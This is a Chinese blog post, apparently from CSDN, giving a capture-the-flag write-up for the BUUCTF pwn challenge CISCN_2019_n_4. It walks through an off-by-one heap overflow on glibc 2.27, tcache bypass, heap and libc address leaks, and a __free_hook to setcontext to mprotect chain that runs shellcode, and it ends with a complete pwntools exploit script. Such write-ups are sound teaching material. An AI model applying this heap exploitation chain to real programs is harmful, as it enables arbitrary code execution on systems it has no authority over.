[buuctf] CISCN_2019_n_4题解

最新推荐文章于 2025-12-05 17:02:52 发布
原创 最新推荐文章于 2025-12-05 17:02:52 发布 · 405 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #CTF #ciscn_2019 #python

[buuctf] CISCN_2019_n_4 WriteUp

这道题基于ubuntu18默认的glibc是libc-2.27,可以在github上自行下载libc.

题目描述:

我们先看主要逻辑

可以看到,程序逻辑比较简单,就是一个经典的菜单题。分析一下漏洞点 

 

可以发现,在编辑函数中有一个off-by-one。

思路整理:

整理思路:

先使用off-by-one制造chunk overlapping,然后因为堆指针直接存放在堆上,所以我们直接通过溢出改写指针,达到任意写和任意读,因为one-gadget用不了,所以我这边采用了setcontext+mprotect的方式执行堆上的shellcode。另外libc2.27采用了Tcache机制,所以为了绕过Tcache把libc基地址泄露出来,我们需要连续释放几个chunk才行。最后让free_hook 调用setcontext再调用mprotect最后调用shellcode。

申请堆块:

    add(0x88,b"\x00")
	add(0x18,b"\x00")
	add(0x88,b"\x00")
	for i in range(7):
		add(0x88,b"\x00")

off-by-one:

    edit(0,b"\x00"*0x88+b"\x61")
	free(1)
	add(0x58,b"\x00"*32+p64(0xffff)+b"\x58")

这里我们就拿到了堆中的一个指针控制权,我们继续构造泄露堆地址

    recv=show(1)
	recv=recv[:-1]
	fastbin=u64(recv.ljust(8,b"\x00"))
	heap_base=fastbin-0xc0-0x60
	unsort_heap=heap_base+0x30
	print(hex(heap_base))

然后是连续释放,让最后一个chunk进入unsorted bin

    edit(1,p64(heap_base+0xc0))
	edit(2,b"\x00"*32+p64(0xffff)+p64(heap_base+0xc0)+p64(0)+p64(0x21)+p64(0x88)+b"\x70")
	edit(1,b"\x00"*24+p64(0x21)+p64(0xffff))
	free(3)
	free(2)
	for i in range(4,10,1):
		free(i)
	free(0)
	edit(1,b"\x00"*24+p64(0x21)+p64(0xffff)+p64(unsort_heap))

获取libc基地址:

    recv=show(1)
	unsorted=recv[:-1]
	unsorted=u64(unsorted.ljust(8,b"\x00"))
	libc_base=unsorted-unsorted_offset
	print(hex(libc_base))
	free_hook=libc_base+libc.symbols['__free_hook']
	print(hex(free_hook))
	one_gadget=libc_base+one_gadget_offset
	print(hex(one_gadget))
	setcontext=libc_base+libc.symbols['setcontext']+53
	print(hex(setcontext))
	mprotect=libc_base+libc.symbols['mprotect']
	print(hex(mprotect))

最后构造payload(里面包含上次文章的FSOP的构造,但是懒得改,所以就小改了一下,凑合着用)

    heap_addr=heap_base
	for i in range(7):
		add(0x88,b"\x00")
	edit(1,b"\x00"*0xb0+p64(0xffff)+p64(free_hook)+p64(0)*2+p64(0xffff))
	edit(1,p64(setcontext))
	stream=p64(0x00000000fbad208b)#magic
	stream=stream.ljust(_IO_write_base_offset,b"\x00")#0x20
	stream+=p64(0x0)#_IO_write_base#0x18
	stream+=p64(0x1)#_IO_write_ptr
	#setcontext [rdi+0xa0]=rsp [rdi+0xa8]=rip [rdi+0x68]=rdi [rdi+0x70]=rsi [rdi+0x88]=rdx
	stream=stream.ljust(0x68,b"\x00")
	stream+=p64(heap_addr-0x250)
	stream=stream.ljust(0x70,b"\x00")
	stream+=p64(0x1000)
	stream=stream.ljust(0x88,b"\x00")
	stream+=p64(0x7)
	stream=stream.ljust(0xa0,b"\x00")
	rsp=heap_addr+0x100+0x100
	stream+=p64(rsp)
	stream+=p64(mprotect)
	#set stream
	stream=stream.ljust(_mode_offset,b"\x00")
	stream+=p64(0x0)#_mode=0xc0
	stream=stream.ljust(vtable_offset,b"\x00")
	vtable_ptr=heap_base+0x100+len(stream)+0x8
	stream+=p64(vtable_ptr)#vtable ptr=0xd8
	payload=stream
	vtable=p64(heap_addr+0x100+816+0x8-0xa0)+b"\x00"*_IO_OVERFLOW_offset*0x10#0x18
	vtable+=p64(setcontext)
	payload+=vtable
	#set jump addr
	payload+=p64(heap_addr+0x100+len(payload)+0x8)

最后将payload读入堆中:

    payload+=bytes(asm(shellcraft.sh()))
	#print payload and check it
	print(hexdump(payload))
	edit(6,payload)

最后的最后调用free函数即可:

    ru(b"Your choice :")
	send(b"4")
	ru(b"Index :")
	send(b"6")
	#gdb.attach(p)
	p.interactive()

结束,拿下flag

完整exp

完整exp:

from pwn import *
elf=ELF('./ciscn_2019_n_4_2.27')

p=process("./ciscn_2019_n_4_2.27")

#p=remote("node5.buuoj.cn",29469)
libc=ELF("/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc.so.6")#/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc.so.6
one_gadget_offset=939255
unsorted_offset=0x3ebca0
vtable_offset=0xd8
_IO_OVERFLOW_offset=0x18
_IO_write_base_offset=0x20
_IO_write_ptr_offset=0x28#_IO_write_base<_IO_write_ptr
_mode_offset=0xc0#<=0
context.arch="amd64"
context.os="linux"
def send(msg):
	p.send(msg)
def ru(msg):
	p.recvuntil(msg)
def add(size,content):
	ru(b"Your choice :")
	send(b"1")
	ru(b"how big is the nest ?")
	send(str(size))
	ru(b"what stuff you wanna put in the nest?")
	send(content)
	ru(b"Thx buddy.\n")
	log.success("add a chunk")
def edit(idx,content):
	ru(b"Your choice :")
	send(b"2")
	ru(b"Index :")
	send(str(idx))
	ru(b"what stuff you wanna put in the nest?")
	send(content)
	ru(b"Done !\n")
	log.success("edit a chunk id="+str(idx))
def free(idx):
	ru(b"Your choice :")
	send(b"4")
	ru(b"Index :")
	send(str(idx))
	ru(b"Now another w0odpeck3r lost his house :(\n")
	log.success("free a chunk id="+str(idx))
def show(idx):
	ru(b"Your choice :")
	send(b"3")
	ru(b"Index :")
	send(str(idx))
	ru(b"Decorations : ")
	recv=p.recvline()
	print(recv)
	ru(b"Done !\n")
	log.success("show a chunk id="+str(idx))
	return recv
if __name__ == "__main__":
	add(0x88,b"\x00")
	add(0x18,b"\x00")
	add(0x88,b"\x00")
	for i in range(7):
		add(0x88,b"\x00")
	edit(0,b"\x00"*0x88+b"\x61")
	free(1)
	add(0x58,b"\x00"*32+p64(0xffff)+b"\x58")
	recv=show(1)
	recv=recv[:-1]
	fastbin=u64(recv.ljust(8,b"\x00"))
	heap_base=fastbin-0xc0-0x60
	unsort_heap=heap_base+0x30
	print(hex(heap_base))
	edit(1,p64(heap_base+0xc0))
	edit(2,b"\x00"*32+p64(0xffff)+p64(heap_base+0xc0)+p64(0)+p64(0x21)+p64(0x88)+b"\x70")
	edit(1,b"\x00"*24+p64(0x21)+p64(0xffff))
	free(3)
	free(2)
	for i in range(4,10,1):
		free(i)
	free(0)
	edit(1,b"\x00"*24+p64(0x21)+p64(0xffff)+p64(unsort_heap))
	recv=show(1)
	unsorted=recv[:-1]
	unsorted=u64(unsorted.ljust(8,b"\x00"))
	libc_base=unsorted-unsorted_offset
	print(hex(libc_base))
	free_hook=libc_base+libc.symbols['__free_hook']
	print(hex(free_hook))
	one_gadget=libc_base+one_gadget_offset
	print(hex(one_gadget))
	setcontext=libc_base+libc.symbols['setcontext']+53
	print(hex(setcontext))
	mprotect=libc_base+libc.symbols['mprotect']
	print(hex(mprotect))
	heap_addr=heap_base
	for i in range(7):
		add(0x88,b"\x00")
	edit(1,b"\x00"*0xb0+p64(0xffff)+p64(free_hook)+p64(0)*2+p64(0xffff))
	edit(1,p64(setcontext))
	stream=p64(0x00000000fbad208b)#magic
	stream=stream.ljust(_IO_write_base_offset,b"\x00")#0x20
	stream+=p64(0x0)#_IO_write_base#0x18
	stream+=p64(0x1)#_IO_write_ptr
	#setcontext [rdi+0xa0]=rsp [rdi+0xa8]=rip [rdi+0x68]=rdi [rdi+0x70]=rsi [rdi+0x88]=rdx
	stream=stream.ljust(0x68,b"\x00")
	stream+=p64(heap_addr-0x250)
	stream=stream.ljust(0x70,b"\x00")
	stream+=p64(0x1000)
	stream=stream.ljust(0x88,b"\x00")
	stream+=p64(0x7)
	stream=stream.ljust(0xa0,b"\x00")
	rsp=heap_addr+0x100+0x100
	stream+=p64(rsp)
	stream+=p64(mprotect)
	#set stream
	stream=stream.ljust(_mode_offset,b"\x00")
	stream+=p64(0x0)#_mode=0xc0
	stream=stream.ljust(vtable_offset,b"\x00")
	vtable_ptr=heap_base+0x100+len(stream)+0x8
	stream+=p64(vtable_ptr)#vtable ptr=0xd8
	payload=stream
	vtable=p64(heap_addr+0x100+816+0x8-0xa0)+b"\x00"*_IO_OVERFLOW_offset*0x10#0x18
	vtable+=p64(setcontext)
	payload+=vtable
	#set jump addr
	payload+=p64(heap_addr+0x100+len(payload)+0x8)
	print(len(payload))
	#sandbox escape;set shellcode.You must set arch and os !!!
	payload+=bytes(asm(shellcraft.sh()))
	#print payload and check it
	print(hexdump(payload))
	edit(6,payload)
	ru(b"Your choice :")
	send(b"4")
	ru(b"Index :")
	send(b"6")
	#gdb.attach(p)
	p.interactive()

exp可行性测试

本地:

远程:

 

flag为动态 

Buuctf-[极客大挑战 2019]BabySQL
m0_63563528的博客
04-12 1834
这题的难点在于不知道过滤内容有哪些,我是通过双写一个一个的试出来的:ununionion ,seselectlect,frfromom,infoorrmation,passwoorrd,whwhereere这些要双写。如此便成功找到flag。
BUUCTF Pwn ciscn_2019_n_8 题解
qq_33348179的博客
11-28 422
运行 得到flag:flag{e4029157-1c00-4d09-a3a4-83855fe74f7f}看到只要var[13]是17 就能进入shell 那一大堆保护不必理会。1.下载 拖入exeinfo。
BUUCTF ciscn_2019_c_1题解
duwgv的博客
04-17 815
payload1=b'\0'+b"a"*0x57+p64(ret)+p64(pop_rdi_addr)+p64(bin_sh)+p64(sys_addr) #把/bin/sh地址加载到rdi再用system函数执行。puts_addr=u64(io.recv(6).ljust(0x08,b"\x00")) #接收 6 字节数据并补齐 8 字节,解析为 64 位地址。elf=ELF('./ci') #加载目标程序的二进制文件,用于获取程序的符号地址。可以看到有三个选项,1,加密,2,解密,3,退出。
buuctf ciscn_2019_n_11
m0_74125780的博客
08-26 298
按tab键打开源码,查看func函数内容,发现有system函数,所以第一步找到cat /flag的地址,0x4006BE。然后gets(v1)函数,我们找到v1的地址0x30,再加上8,因为是64bit,如果是32便加4。首先用checksec检查,是64bit,然后用ida打开。接着编写脚本,运行得到flag。
BUUCTF Pwn ciscn_2019_n_1 题解
qq_33348179的博客
11-17 241
发现v1和v2差了44个字符 那就要输入字符超过v1再输入v2。输入v1,当v2=11.28125时就得到flag。看到是64位elf 拖入IDA64。1.下载文件 拖入exeinfo。但是输入的是v1 双击v2看看。v2的浮点数记得转换为16进制。
BUUCTF Pwn ciscn_2019_ne_5 题解
qq_33348179的博客
12-12 328
按1可以存入字符串到src 按4到Getflag函数 将src复制到dest里 但是未对长度作出限制 所以是关于strcpy的栈溢出漏洞。找到system函数及binsh(32位 用IDA32打开。下载 checksec。
BUUCTF ciscn_2019_c_1 题解
qq_51802916的博客
08-20 547
这个地方还会涉及到堆栈对齐的问题,有时候POC都构造正确了,但是运行时仍然报段错误,可能就是堆栈没有对齐,这是我们可以加入一条ret指令,改变一下堆栈,例如假如rsp指向了0xff88,这是一个没有对齐的地址,增加ret后就会变成0xff90,这个一个已经对齐的地址,可以正常运行。,这里显然可以进行缓冲区溢出利用,中间的部分是对字符串进行处理,我们不需要看得太仔细,因为可以通过传入\x00字符使循环提前终止,这样就不会影响我们的payload的了。的装载地址和shell字符串的装载地址,然后构造POC了。
BUUCTF Pwn ciscn_2019_c_1 题解
qq_33348179的博客
12-01 484
2.接下来找libc的版本 利用 libc地址 = 真实地址 - 偏移地址 得到system和binsh的地址。其中,用两次recvline()的原因是隔离掉 \n 和 ciphertext。puts_address的那一大串是用于接收地址 去掉结尾的\0 并且将长度补到。SHIFT+F12查看字符串 可以看到没有后门函数 这是一道ret2libc题。同时因为这是64位程序,函数参数用寄存器存储且第一个是 RDI寄存器。1.首先,构造payload1,得到puts的真实地址。ret用于64位栈平衡。
buuctf--ciscn_2019_s_4
2301_81060697的博客
04-21 602
简单栈迁移
buuctf ciscn_2019_c_1 wp
yajuanpi4899的博客
01-16 731
目录 一、题目速阅 二、知识要点 三、题解payload 一、题目速阅 拿到题目,进行check └─$ checksec ciscn_2019_c_1 1 ⚙ [*] '/home/kali/Desktop/prac/ciscn_2019_c_1' Arch: amd64-64-little R
BUUCTF ciscn_2019_es_2
2401_85052854的博客
03-20 833
BUUCTF ciscn_2019_es_2 的wp
(BUUCTF) ciscn_2019_final_4
xy1458214551的博客
11-28 359
buuctf上的ciscn_2019_final_4题解
推荐 | JoyAgent-JDGenie:开箱即用的端到端多智能体产品
lpfasd123的博客
12-05 79
如果你在寻找一款真正可落地的多智能体产品,用来“搜索-分析-生成报告”、“数据问答与诊断”、“代码解释与图表生成”,同时希望易部署、易扩展、易二次开发——JoyAgent-JDGenie 是非常值得试用与推荐的选择。只需填好少量配置,即可获得端到端的流式体验与交付能力。
50、【Ubuntu】【Gitlab】拉出内网 Web 服务:http.server 单/多线程分析(二)
HIT_Weston的博客
12-04 952
本文分析了Python的http.server模块在单线程和多线程模式下的性能表现。通过测试发现,单线程模式下(Python<3.7)并发请求会被阻塞,后发请求需要等待前一个请求完成;而多线程模式下(Python≥3.7)可以同时处理多个请求。作者通过slow_server.py脚本模拟耗时操作,使用time curl命令测试响应时间,验证了线程模型的差异。文章还指出Python 3.7是一个重要分水岭,官方将默认命令行服务器升级为多线程以提升用户体验。技术细节参考了CPython源码,并提供了Git
大模型应用:大模型 MapReduce 全解析:核心概念、中文语料示例实现.12
minhuan的专栏
12-03 1079
本文介绍了MapReduce编程模型及其在大模型训练中的应用。MapReduce通过"分治-并行-聚合"思想处理大规模数据,传统Hadoop MapReduce侧重结构化数据计算,而大模型MapReduce则针对自然语言处理任务。文章详细对比了两者在架构、处理对象和核心算力等方面的差异,并提供了中文词频统计的Python实现示例,包括单机版和分布式版本。分布式实现利用多进程模拟集群计算,展示了数据分片、Map、Shuffle和Reduce的完整流程。
零基础学JAVA--Day41(IO文件流+IO流原理+InputStream+OutputStream)
最新发布
Dxxyyyy的博客
12-05 507
文件在程序中是以流的形式来操作的流:数据在数据源(文件)和程序(内存)之间经历的路径输入流:数据从数据源(文件)到程序(内存)的路径输出流:数据从程序(内存)到数据源(文件)的路径。
【Android逆向工程】第19章:协议分析与接口还原
w987333120的博客
12-03 381
本文介绍了网络协议分析的关键技术与工具。主要内容包括HTTP/HTTPS协议分析流程、常用抓包工具配置(Charles/Burp Suite)、协议格式解析方法以及签名算法还原技术。通过示例展示了完整的请求/响应分析过程,涵盖请求行、请求头、请求体的解析方法,特别关注签名相关字段的识别。文章还提供了Python代码示例演示如何自动分析HTTP请求结构,帮助逆向工程师理解业务逻辑、还原接口签名算法并实现自动化脚本。
使用 DeepSeek 提升工作效率
Deng872347348的博客
12-03 655
摘要:本文系统介绍了如何利用DeepSeek AI工具提升工作效率。文章首先分析职场痛点,指出DeepSeek在技术文档、代码开发、数据处理等专业场景的优势。随后详细解析核心功能模块,包括文本生成、代码支持、数据分析和知识管理,并明确其适用边界。重点提供了可直接复用的指令模板,涵盖技术文档撰写、脚本开发、数据可视化等典型场景,如自动生成API文档、Python数据分析脚本等。最后给出集成办公软件的最佳实践,并针对不同行业提供适配方案,强调AI工具"增强而非替代"的定位,帮助用户将重复性工
python+django/flask+vue的基于协同过滤算法的体育商品推荐系统
Q_Q1963288475的博客
12-04 519
相比于传统的体育商品推荐方式,个性化智能的管理方式可以大幅提高体育商品推荐的管理效率,实现了个性化智能体育商品推荐的标准化、制度化、程序化的管理,有效地防止了体育商品推荐的随意管理, 功能主要包括首页、个人中心、用户管理、商品分类管理、商品信息管理、交流论坛、留言板、系统管理、订单管理等功能,从而实现个性化智能体育商品推荐方式,提高个性化智能体育商品推荐的效率。
浙江大学ACM题解资料整理分享
资源摘要信息:"浙江大学 ACM 题解" ACM国际大学生程序设计竞赛(ACM International Collegiate Programming Contest, 简称ACM-ICPC)是由国际计算机学界权威的学术组织ACM学会(Association for Computing ...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值